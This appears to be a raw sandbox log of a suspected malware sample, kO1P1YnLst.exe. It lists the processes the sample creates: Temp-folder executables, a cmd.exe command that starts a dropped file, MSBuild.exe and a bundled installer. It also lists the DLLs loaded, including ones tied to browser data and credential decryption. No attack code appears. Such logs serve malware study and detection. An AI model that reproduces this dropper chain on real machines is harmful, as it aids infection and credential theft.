Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\IIDHJDGCGD.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\IIDHJDGCGD.exe "C:\Users\user\AppData\Local\Temp\IIDHJDGCGD.exe"
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 416 -s 2256
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Process created: C:\Users\user\AppData\Local\Temp\u5c4.0.exe "C:\Users\user\AppData\Local\Temp\u5c4.0.exe"	Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Process created: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe "C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe"	Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Process created: C:\Users\user\AppData\Local\Temp\u5c4.3.exe "C:\Users\user\AppData\Local\Temp\u5c4.3.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\IIDHJDGCGD.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe	Process created: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe "C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\IIDHJDGCGD.exe "C:\Users\user\AppData\Local\Temp\IIDHJDGCGD.exe"

Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Section loaded: zipfldr.dll	Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Section loaded: winshfhc.dll	Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Section loaded: wdscore.dll	Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Section loaded: winshfhc.dll	Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Section loaded: wdscore.dll	Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe	Section loaded: oledlg.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe	Section loaded: pla.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe	Section loaded: tdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winbrand.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe	Section loaded: security.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe	Section loaded: olepro32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe	Section loaded: schedcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe	Section loaded: msxml6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe	Section loaded: idndl.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe	Section loaded: oledlg.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe	Section loaded: usp10.dll	Jump to behavior
